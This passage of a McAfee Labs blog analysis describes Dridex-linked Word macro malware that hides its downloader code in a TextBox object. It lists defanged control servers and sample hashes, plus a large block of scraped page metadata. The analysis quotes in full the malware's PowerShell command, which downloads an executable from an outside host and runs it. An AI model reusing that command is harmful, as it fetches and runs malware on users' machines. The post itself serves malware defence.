- \n
- The malicious XML document is now hidden in a multipart MIME object distributed as .RTF or .DOC files that\u00a0arrive via phishing or spam emails. Upon opening the attachments on these emails, the malicious code in the embedded OLE document runs.<\/li>\n
- The code responsible for\u00a0downloading and executing the final payload is no longer in the macro. It is now in a TextBox1 object embedded in a form object, shown in the following image:<\/span><\/li>\n<\/ul>\n
![\"TextBox1\"](\"https:\/\/securingtomorrow.mcafee.com\/wp-content\/uploads\/textbox1-1.png\")
Malicious code present in a TextBox object property.<\/em><\/figcaption><\/figure>\n As we can see in the preceding shot, the malicious\u00a0code is hidden within\u00a0the Value and Text attributes from\u00a0the TextBox1 object, and of course are not visible in the macros. In the image we have resized the TextBox1 object to show the code. The actual TextBox1 object in the malware is very small, which at first effectively hides it.<\/p>\n
We found other macros in the document but their only function is to execute the code in TextBox1 object, as the following shots show:<\/p>\n
![\"ThisDocument\"](\"https:\/\/securingtomorrow.mcafee.com\/wp-content\/uploads\/ThisDocument-1.png\")
ThisDocument code calling the dsfsdff module.<\/em><\/figcaption><\/figure>\n <\/p>\n
![\"Module1\"](\"https:\/\/securingtomorrow.mcafee.com\/wp-content\/uploads\/module1-1.png\")
The dsfsdff module running the TextBox object in a form object (rddchgvjj).<\/em><\/figcaption><\/figure>\n By calling the TextBox1 object, shown above, the malware executes the following PowerShell command to download and execute the malicious payload:<\/p>\n
cmd \/K PowerShell.exe (New-Object System.Net.WebClient).DownloadFile(‘http:\/\/raspberry.diversified-capital-management.com\/zalupa\/kurva.php’,’%TEMP%\\sdjgbcjkds.exe’);Start-Process ‘%TEMP%\\sdjgbcjkds.exe’;<\/p>\n
The malicious payload is associated with Dridex, \u201cbanking\u201d malware that can steal user credentials for online banking accounts. Dridex was derived from Cridex and both are part of the GameOver Zeus malware family.<\/p>\n
Full descriptions of the W97M, X97M, and Dridex malware families are available in\u00a0our Threat Advisory:<\/p>\n
- \n
- W97M\/Downloader and X97M\/Downloader Threat Advisory<\/li>\n<\/ul>\n
We recommend that users never open emails sent by unknown parties, especially if they come with unknown attachments. We also recommend that users not\u00a0enable macro functionality within Microsoft Office. Malicious emails commonly contain instructions\u00a0asking users to enable macros and giving specific instructions for how to enable them, but users should never\u00a0follow\u00a0these instructions.<\/p>\n
During our analysis, the malware contacted the following control servers (with URLs modified for safety):<\/h2>\n
- \n
- hxxp:\/\/raspberry(.)diversified-capital-management(.)com<\/li>\n
- hxxp:\/\/7awhiudnj(.)holycrosschildrensservices(.)info<\/li>\n
- hxxp:\/\/amytiville(.)boysville(.)org<\/li>\n
- hxxp:\/\/charity(.)boysville(.)net<\/li>\n
- hxxp:\/\/backup(.)hcyfs(.)com<\/li>\n
- hxxp:\/\/j1k4cnee(.)holycrosschildrensservices(.)com<\/li>\n<\/ul>\n
MD5 hashes for\u00a0the samples we found:<\/h2>\n
- \n
- W97M\/Downloaders\n
- \n
- 007460CF17C20C6712F6586B1C3B4D01<\/li>\n
- 2E8B7B97F174B4C05EDE779A6E14CE37<\/li>\n
- E2A8B1C64949578A090622B2070D16CE<\/li>\n
- 0F6FFC572B3EFA5F6104C83800C96A01<\/li>\n
- 382F81246E722BBB7C9AC1BDDD04BC9B<\/li>\n
- 4BF5207913CBADF3F35E21D1DB2000E3<\/li>\n
- 601400AAA44BB0EF053C5ED096BD2BEF<\/li>\n
- 70FF8122D780DFDAC91172B3B0AAAEDC<\/li>\n
- 9B0404BBB4B3267255B31C39C5D00B77<\/li>\n
- F21B33CAE6FDCC92DCAE1E7E3CCD9D9C<\/li>\n<\/ul>\n<\/li>\n<\/ul>\n
- \n
- Dridex\n
- \n
- A08E252320256B6D7D2FC90ACFD0954A<\/li>\n<\/ul>\n<\/li>\n<\/ul>\n
McAfee advises all users to keep their antimalware signatures up to date at all times. McAfee products detect this Office malformed Trojan as W97M\/Downloader![Partial hash] and Dridex as Trojan-Dridex with DAT Versions 8097 and later.<\/p>\n","protected":false},"excerpt":{"rendered":"
Macro malware is on the upswing and cybercriminals are always searching for new ways to deceive users and evade detection….<\/p>\n","protected":false},"author":771,"featured_media":0,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"_acf_changed":false,"footnotes":""},"categories":[442],"tags":[1814,76,338,180],"coauthors":[3077],"class_list":["post-48006","post","type-post","status-publish","format-standard","hentry","category-mcafee-labs","tag-computer-security","tag-cybercrime","tag-endpoint-protection","tag-malware"],"acf":[],"yoast_head":"\n
Macro Malware Associated With Dridex Finds New Ways to Hide | McAfee Blog<\/title>\n<meta name=\"description\" content=\"Macro malware is on the upswing and cybercriminals are always searching for new ways to deceive users and evade detection. McAfee Labs recently discovered\" \/>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<meta property=\"og:locale\" content=\"en_US\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"Macro Malware Associated With Dridex Finds New Ways to Hide | McAfee Blog\" \/>\n<meta property=\"og:description\" content=\"Macro malware is on the upswing and cybercriminals are always searching for new ways to deceive users and evade detection. McAfee Labs recently discovered\" \/>\n<meta property=\"og:url\" content=\"https:\/\/www.mcafee.com\/blogs\/other-blogs\/mcafee-labs\/macro-malware-associated-dridex-finds-new-ways-hide\/\" \/>\n<meta property=\"og:site_name\" content=\"McAfee Blog\" \/>\n<meta property=\"article:publisher\" content=\"https:\/\/www.facebook.com\/McAfee\/\" \/>\n<meta property=\"article:author\" content=\"https:\/\/www.facebook.com\/jorgeariasv\" \/>\n<meta property=\"article:published_time\" content=\"2016-03-08T20:57:50+00:00\" \/>\n<meta property=\"article:modified_time\" content=\"2025-06-03T02:15:56+00:00\" \/>\n<meta property=\"og:image\" content=\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/textbox1-1.png\" \/>\n\t<meta property=\"og:image:width\" content=\"1078\" \/>\n\t<meta property=\"og:image:height\" content=\"612\" \/>\n\t<meta property=\"og:image:type\" content=\"image\/png\" \/>\n<meta name=\"author\" content=\"Jorge Arias\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:creator\" content=\"@n_John_g_\" \/>\n<meta name=\"twitter:site\" content=\"@McAfee\" \/>\n<meta name=\"twitter:label1\" content=\"Written by\" \/>\n\t<meta name=\"twitter:data1\" content=\"Jorge Arias\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data2\" content=\"3 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\/\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\/\/www.mcafee.com\/blogs\/other-blogs\/mcafee-labs\/macro-malware-associated-dridex-finds-new-ways-hide\/#article\",\"isPartOf\":{\"@id\":\"https:\/\/www.mcafee.com\/blogs\/other-blogs\/mcafee-labs\/macro-malware-associated-dridex-finds-new-ways-hide\/\"},\"author\":{\"name\":\"Jorge Arias\",\"@id\":\"https:\/\/www.mcafee.com\/blogs\/#\/schema\/person\/00fb6bcebfad67078d8b77a9069abbb5\"},\"headline\":\"Macro Malware Associated With Dridex Finds New Ways to Hide\",\"datePublished\":\"2016-03-08T20:57:50+00:00\",\"dateModified\":\"2025-06-03T02:15:56+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\/\/www.mcafee.com\/blogs\/other-blogs\/mcafee-labs\/macro-malware-associated-dridex-finds-new-ways-hide\/\"},\"wordCount\":652,\"publisher\":{\"@id\":\"https:\/\/www.mcafee.com\/blogs\/#organization\"},\"image\":{\"@id\":\"https:\/\/www.mcafee.com\/blogs\/other-blogs\/mcafee-labs\/macro-malware-associated-dridex-finds-new-ways-hide\/#primaryimage\"},\"thumbnailUrl\":\"https:\/\/securingtomorrow.mcafee.com\/wp-content\/uploads\/textbox1-1.png\",\"keywords\":[\"computer security\",\"cybercrime\",\"endpoint protection\",\"malware\"],\"articleSection\":[\"McAfee Labs\"],\"inLanguage\":\"en-US\"},{\"@type\":\"WebPage\",\"@id\":\"https:\/\/www.mcafee.com\/blogs\/other-blogs\/mcafee-labs\/macro-malware-associated-dridex-finds-new-ways-hide\/\",\"url\":\"https:\/\/www.mcafee.com\/blogs\/other-blogs\/mcafee-labs\/macro-malware-associated-dridex-finds-new-ways-hide\/\",\"name\":\"Macro Malware Associated With Dridex Finds New Ways to Hide | McAfee Blog\",\"isPartOf\":{\"@id\":\"https:\/\/www.mcafee.com\/blogs\/#website\"},\"primaryImageOfPage\":{\"@id\":\"https:\/\/www.mcafee.com\/blogs\/other-blogs\/mcafee-labs\/macro-malware-associated-dridex-finds-new-ways-hide\/#primaryimage\"},\"image\":{\"@id\":\"https:\/\/www.mcafee.com\/blogs\/other-blogs\/mcafee-labs\/macro-malware-associated-dridex-finds-new-ways-hide\/#primaryimage\"},\"thumbnailUrl\":\"https:\/\/securingtomorrow.mcafee.com\/wp-content\/uploads\/textbox1-1.png\",\"datePublished\":\"2016-03-08T20:57:50+00:00\",\"dateModified\":\"2025-06-03T02:15:56+00:00\",\"description\":\"Macro malware is on the upswing and cybercriminals are always searching for new ways to deceive users and evade detection. McAfee Labs recently discovered\",\"breadcrumb\":{\"@id\":\"https:\/\/www.mcafee.com\/blogs\/other-blogs\/mcafee-labs\/macro-malware-associated-dridex-finds-new-ways-hide\/#breadcrumb\"},\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\/\/www.mcafee.com\/blogs\/other-blogs\/mcafee-labs\/macro-malware-associated-dridex-finds-new-ways-hide\/\"]}]},{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\/\/www.mcafee.com\/blogs\/other-blogs\/mcafee-labs\/macro-malware-associated-dridex-finds-new-ways-hide\/#primaryimage\",\"url\":\"https:\/\/securingtomorrow.mcafee.com\/wp-content\/uploads\/textbox1-1.png\",\"contentUrl\":\"https:\/\/securingtomorrow.mcafee.com\/wp-content\/uploads\/textbox1-1.png\"},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\/\/www.mcafee.com\/blogs\/other-blogs\/mcafee-labs\/macro-malware-associated-dridex-finds-new-ways-hide\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Blog\",\"item\":\"https:\/\/www.mcafee.com\/blogs\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"Other Blogs\",\"item\":\"https:\/\/www.mcafee.com\/blogs\/other-blogs\/\"},{\"@type\":\"ListItem\",\"position\":3,\"name\":\"McAfee Labs\",\"item\":\"https:\/\/www.mcafee.com\/blogs\/other-blogs\/mcafee-labs\/\"},{\"@type\":\"ListItem\",\"position\":4,\"name\":\"Macro Malware Associated With Dridex Finds New Ways to Hide\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\/\/www.mcafee.com\/blogs\/#website\",\"url\":\"https:\/\/www.mcafee.com\/blogs\/\",\"name\":\"McAfee Blog\",\"description\":\"Internet Security News\",\"publisher\":{\"@id\":\"https:\/\/www.mcafee.com\/blogs\/#organization\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\/\/www.mcafee.com\/blogs\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"en-US\"},{\"@type\":\"Organization\",\"@id\":\"https:\/\/www.mcafee.com\/blogs\/#organization\",\"name\":\"McAfee\",\"url\":\"https:\/\/www.mcafee.com\/blogs\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\/\/www.mcafee.com\/blogs\/#\/schema\/logo\/image\/\",\"url\":\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2023\/02\/mcafee-logo.png\",\"contentUrl\":\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2023\/02\/mcafee-logo.png\",\"width\":1286,\"height\":336,\"caption\":\"McAfee\"},\"image\":{\"@id\":\"https:\/\/www.mcafee.com\/blogs\/#\/schema\/logo\/image\/\"},\"sameAs\":[\"https:\/\/www.facebook.com\/McAfee\/\",\"https:\/\/x.com\/McAfee\",\"https:\/\/www.linkedin.com\/company\/mcafee\/\",\"https:\/\/www.youtube.com\/McAfee\"]},{\"@type\":\"Person\",\"@id\":\"https:\/\/www.mcafee.com\/blogs\/#\/schema\/person\/00fb6bcebfad67078d8b77a9069abbb5\",\"name\":\"Jorge Arias\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\/\/www.mcafee.com\/blogs\/#\/schema\/person\/image\/c55fbf619cb4d744f9ed6dd76bbad8e3\",\"url\":\"https:\/\/secure.gravatar.com\/avatar\/f254462555885d5fb96bdc77199d0440?s=96&d=mm&r=g\",\"contentUrl\":\"https:\/\/secure.gravatar.com\/avatar\/f254462555885d5fb96bdc77199d0440?s=96&d=mm&r=g\",\"caption\":\"Jorge Arias\"},\"description\":\"Jorge works at McAfee as Anti-Malware Security Researcher. He is a malware research specialist adding detection and repair for malicious threats to protect our customers. Arias has more than 6 years of experience analyzing malware and was technical lead on his previous role as Field Engineer before joining Threat Intelligence & Escalations Team. - Twitter: @Sairraj\",\"sameAs\":[\"https:\/\/www.facebook.com\/jorgeariasv\",\"https:\/\/www.linkedin.com\/in\/jorgeariasvelasquez\/?locale=en_US\",\"https:\/\/x.com\/n_John_g_\"],\"url\":\"https:\/\/www.mcafee.com\/blogs\/author\/jorge-arias\/\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"Macro Malware Associated With Dridex Finds New Ways to Hide | McAfee Blog","description":"Macro malware is on the upswing and cybercriminals are always searching for new ways to deceive users and evade detection. McAfee Labs recently discovered","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"og_locale":"en_US","og_type":"article","og_title":"Macro Malware Associated With Dridex Finds New Ways to Hide | McAfee Blog","og_description":"Macro malware is on the upswing and cybercriminals are always searching for new ways to deceive users and evade detection. McAfee Labs recently discovered","og_url":"https:\/\/www.mcafee.com\/blogs\/other-blogs\/mcafee-labs\/macro-malware-associated-dridex-finds-new-ways-hide\/","og_site_name":"McAfee Blog","article_publisher":"https:\/\/www.facebook.com\/McAfee\/","article_author":"https:\/\/www.facebook.com\/jorgeariasv","article_published_time":"2016-03-08T20:57:50+00:00","article_modified_time":"2025-06-03T02:15:56+00:00","og_image":[{"width":1078,"height":612,"url":"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/textbox1-1.png","type":"image\/png"}],"author":"Jorge Arias","twitter_card":"summary_large_image","twitter_creator":"@n_John_g_","twitter_site":"@McAfee","twitter_misc":{"Written by":"Jorge Arias","Est. reading time":"3 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/www.mcafee.com\/blogs\/other-blogs\/mcafee-labs\/macro-malware-associated-dridex-finds-new-ways-hide\/#article","isPartOf":{"@id":"https:\/\/www.mcafee.com\/blogs\/other-blogs\/mcafee-labs\/macro-malware-associated-dridex-finds-new-ways-hide\/"},"author":{"name":"Jorge Arias","@id":"https:\/\/www.mcafee.com\/blogs\/#\/schema\/person\/00fb6bcebfad67078d8b77a9069abbb5"},"headline":"Macro Malware Associated With Dridex Finds New Ways to Hide","datePublished":"2016-03-08T20:57:50+00:00","dateModified":"2025-06-03T02:15:56+00:00","mainEntityOfPage":{"@id":"https:\/\/www.mcafee.com\/blogs\/other-blogs\/mcafee-labs\/macro-malware-associated-dridex-finds-new-ways-hide\/"},"wordCount":652,"publisher":{"@id":"https:\/\/www.mcafee.com\/blogs\/#organization"},"image":{"@id":"https:\/\/www.mcafee.com\/blogs\/other-blogs\/mcafee-labs\/macro-malware-associated-dridex-finds-new-ways-hide\/#primaryimage"},"thumbnailUrl":"https:\/\/securingtomorrow.mcafee.com\/wp-content\/uploads\/textbox1-1.png","keywords":["computer security","cybercrime","endpoint protection","malware"],"articleSection":["McAfee Labs"],"inLanguage":"en-US"},{"@type":"WebPage","@id":"https:\/\/www.mcafee.com\/blogs\/other-blogs\/mcafee-labs\/macro-malware-associated-dridex-finds-new-ways-hide\/","url":"https:\/\/www.mcafee.com\/blogs\/other-blogs\/mcafee-labs\/macro-malware-associated-dridex-finds-new-ways-hide\/","name":"Macro Malware Associated With Dridex Finds New Ways to Hide | McAfee Blog","isPartOf":{"@id":"https:\/\/www.mcafee.com\/blogs\/#website"},"primaryImageOfPage":{"@id":"https:\/\/www.mcafee.com\/blogs\/other-blogs\/mcafee-labs\/macro-malware-associated-dridex-finds-new-ways-hide\/#primaryimage"},"image":{"@id":"https:\/\/www.mcafee.com\/blogs\/other-blogs\/mcafee-labs\/macro-malware-associated-dridex-finds-new-ways-hide\/#primaryimage"},"thumbnailUrl":"https:\/\/securingtomorrow.mcafee.com\/wp-content\/uploads\/textbox1-1.png","datePublished":"2016-03-08T20:57:50+00:00","dateModified":"2025-06-03T02:15:56+00:00","description":"Macro malware is on the upswing and cybercriminals are always searching for new ways to deceive users and evade detection. McAfee Labs recently discovered","breadcrumb":{"@id":"https:\/\/www.mcafee.com\/blogs\/other-blogs\/mcafee-labs\/macro-malware-associated-dridex-finds-new-ways-hide\/#breadcrumb"},"inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https:\/\/www.mcafee.com\/blogs\/other-blogs\/mcafee-labs\/macro-malware-associated-dridex-finds-new-ways-hide\/"]}]},{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/www.mcafee.com\/blogs\/other-blogs\/mcafee-labs\/macro-malware-associated-dridex-finds-new-ways-hide\/#primaryimage","url":"https:\/\/securingtomorrow.mcafee.com\/wp-content\/uploads\/textbox1-1.png","contentUrl":"https:\/\/securingtomorrow.mcafee.com\/wp-content\/uploads\/textbox1-1.png"},{"@type":"BreadcrumbList","@id":"https:\/\/www.mcafee.com\/blogs\/other-blogs\/mcafee-labs\/macro-malware-associated-dridex-finds-new-ways-hide\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Blog","item":"https:\/\/www.mcafee.com\/blogs\/"},{"@type":"ListItem","position":2,"name":"Other Blogs","item":"https:\/\/www.mcafee.com\/blogs\/other-blogs\/"},{"@type":"ListItem","position":3,"name":"McAfee Labs","item":"https:\/\/www.mcafee.com\/blogs\/other-blogs\/mcafee-labs\/"},{"@type":"ListItem","position":4,"name":"Macro Malware Associated With Dridex Finds New Ways to Hide"}]},{"@type":"WebSite","@id":"https:\/\/www.mcafee.com\/blogs\/#website","url":"https:\/\/www.mcafee.com\/blogs\/","name":"McAfee Blog","description":"Internet Security News","publisher":{"@id":"https:\/\/www.mcafee.com\/blogs\/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/www.mcafee.com\/blogs\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"en-US"},{"@type":"Organization","@id":"https:\/\/www.mcafee.com\/blogs\/#organization","name":"McAfee","url":"https:\/\/www.mcafee.com\/blogs\/","logo":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/www.mcafee.com\/blogs\/#\/schema\/logo\/image\/","url":"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2023\/02\/mcafee-logo.png","contentUrl":"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2023\/02\/mcafee-logo.png","width":1286,"height":336,"caption":"McAfee"},"image":{"@id":"https:\/\/www.mcafee.com\/blogs\/#\/schema\/logo\/image\/"},"sameAs":["https:\/\/www.facebook.com\/McAfee\/","https:\/\/x.com\/McAfee","https:\/\/www.linkedin.com\/company\/mcafee\/","https:\/\/www.youtube.com\/McAfee"]},{"@type":"Person","@id":"https:\/\/www.mcafee.com\/blogs\/#\/schema\/person\/00fb6bcebfad67078d8b77a9069abbb5","name":"Jorge Arias","image":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/www.mcafee.com\/blogs\/#\/schema\/person\/image\/c55fbf619cb4d744f9ed6dd76bbad8e3","url":"https:\/\/secure.gravatar.com\/avatar\/f254462555885d5fb96bdc77199d0440?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/f254462555885d5fb96bdc77199d0440?s=96&d=mm&r=g","caption":"Jorge Arias"},"description":"Jorge works at McAfee as Anti-Malware Security Researcher. He is a malware research specialist adding detection and repair for malicious threats to protect our customers. Arias has more than 6 years of experience analyzing malware and was technical lead on his previous role as Field Engineer before joining Threat Intelligence & Escalations Team. - Twitter: @Sairraj","sameAs":["https:\/\/www.facebook.com\/jorgeariasv","https:\/\/www.linkedin.com\/in\/jorgeariasvelasquez\/?locale=en_US","https:\/\/x.com\/n_John_g_"],"url":"https:\/\/www.mcafee.com\/blogs\/author\/jorge-arias\/"}]}},"_links":{"self":[{"href":"https:\/\/www.mcafee.com\/blogs\/wp-json\/wp\/v2\/posts\/48006","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.mcafee.com\/blogs\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.mcafee.com\/blogs\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.mcafee.com\/blogs\/wp-json\/wp\/v2\/users\/771"}],"replies":[{"embeddable":true,"href":"https:\/\/www.mcafee.com\/blogs\/wp-json\/wp\/v2\/comments?post=48006"}],"version-history":[{"count":2,"href":"https:\/\/www.mcafee.com\/blogs\/wp-json\/wp\/v2\/posts\/48006\/revisions"}],"predecessor-version":[{"id":214926,"href":"https:\/\/www.mcafee.com\/blogs\/wp-json\/wp\/v2\/posts\/48006\/revisions\/214926"}],"wp:attachment":[{"href":"https:\/\/www.mcafee.com\/blogs\/wp-json\/wp\/v2\/media?parent=48006"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.mcafee.com\/blogs\/wp-json\/wp\/v2\/categories?post=48006"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.mcafee.com\/blogs\/wp-json\/wp\/v2\/tags?post=48006"},{"taxonomy":"author","embeddable":true,"href":"https:\/\/www.mcafee.com\/blogs\/wp-json\/wp\/v2\/coauthors?post=48006"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}
- A08E252320256B6D7D2FC90ACFD0954A<\/li>\n<\/ul>\n<\/li>\n<\/ul>\n
- Dridex\n
- W97M\/Downloaders\n
- W97M\/Downloader and X97M\/Downloader Threat Advisory<\/li>\n<\/ul>\n